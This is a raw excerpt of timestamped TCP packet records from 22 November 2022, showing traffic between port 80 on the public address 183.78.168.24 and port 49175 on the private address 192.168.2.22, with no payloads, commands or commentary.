                                                                                Nov 22, 2022 05:09:11.013797998 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.013842106 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.013855934 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.013952971 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014017105 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.014070988 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014194965 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014235973 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014250994 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.014379978 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014411926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014467001 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.014473915 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014552116 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014561892 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.014652014 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014717102 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.014720917 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014843941 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014863014 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.014899015 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.014975071 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015048027 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.015084982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015160084 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015212059 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.015239954 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015355110 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015408993 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.015450001 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015506029 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015557051 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.015611887 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015733957 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015763044 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015794992 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.015906096 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.015964985 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.015969038 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016036987 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016086102 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.016110897 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016196966 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016247034 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.016314030 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016415119 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016470909 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.016505003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016618013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016676903 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.016679049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016799927 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016849995 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.016875982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016927004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.016978979 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.017033100 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.017122030 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.017172098 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.017225027 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.017314911 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.017365932 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.017394066 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.166779041 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.166851044 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.166929960 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.166934013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.166980982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.166992903 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.167038918 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167083979 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167095900 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.167126894 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167185068 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.167188883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167236090 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167295933 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.167404890 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167474985 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167520046 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167527914 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.167562008 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167618990 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.167676926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167766094 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.167819977 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.167871952 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168018103 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168067932 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168073893 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.168108940 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168162107 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.168215990 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168289900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168339968 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.168423891 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168521881 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168561935 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168576002 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.168677092 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168726921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168737888 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.168809891 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168865919 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.168893099 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.168979883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169085979 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169089079 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.169189930 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169244051 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.169276953 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169357061 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169409990 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.169428110 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169502974 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169555902 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.169634104 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169677019 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169728041 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.169780016 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169855118 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.169904947 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.170011997 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170054913 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170106888 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.170161009 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170203924 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170257092 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.170355082 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170445919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170486927 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170559883 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.170593023 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170671940 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170681000 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.170773983 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170855999 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.170895100 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.170944929 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.171021938 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.171022892 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.171097994 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.171199083 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.171257973 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.171319962 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.171441078 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.171447992 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.171504021 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.171561956 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.171643019 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.171703100 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.171751976 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.171761036 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.321432114 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.321500063 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.321542025 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.321582079 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.321604967 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.321604967 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.321630001 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.321671009 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.321676970 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.321794987 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.321832895 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.321841002 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.321945906 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322040081 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322097063 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.322168112 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322210073 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322310925 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.322329044 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322371960 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322421074 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.322505951 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322617054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322665930 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.322693110 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322773933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322943926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.322990894 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323004961 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.323029995 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323070049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323115110 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.323203087 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323302984 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323345900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323354006 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.323451996 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323509932 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.323574066 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323652029 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323734045 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323775053 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.323776007 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.323880911 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.324006081 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.324040890 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.324088097 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.324129105 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.324243069 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.326514006 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.326565981 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.326606035 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.326615095 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.326646090 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.326687098 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.326689959 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.326726913 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.326764107 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.326766968 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327006102 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327076912 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.327130079 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327171087 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327210903 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327250957 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327258110 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.327358007 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327408075 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327449083 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327452898 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.327487946 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327527046 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327537060 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.327567101 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.327967882 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.330013037 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.330063105 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.330102921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.330125093 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.330240965 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.330285072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.330290079 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.330323935 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.330364943 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.330368042 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.330409050 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.330451012 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.475706100 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.475878000 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.476505041 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.476506948 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.477360010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478729963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478811979 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.478821039 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478840113 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478858948 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478895903 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478907108 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.478919029 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478935003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478951931 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478969097 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.478969097 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.478987932 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479007006 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479016066 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.479023933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479042053 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479058981 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479072094 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.479078054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479094982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479110956 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479125023 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.479127884 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479146004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479161024 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479177952 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479180098 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.479193926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479209900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479211092 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.479227066 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479233027 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.479243040 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479259968 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479270935 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.479278088 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479295015 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479310989 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479321003 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.479326963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.479368925 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.484606028 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.484626055 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.484642982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.484718084 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.484745026 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.484795094 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.484839916 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.484908104 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.484954119 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.485053062 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485132933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485183001 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.485209942 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485246897 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485290051 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.485371113 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485450983 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485501051 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.485529900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485634089 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485677958 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.485732079 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485814095 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485855103 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.485909939 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.485971928 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486098051 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486107111 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.486166954 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486253023 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486372948 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486381054 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.486443043 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486572027 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486637115 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.486654043 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486733913 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486773968 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486850023 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.486917973 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.488574028 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.632271051 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.632317066 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.632416010 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.636528015 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.636565924 CET8049175183.78.168.24192.168.2.22
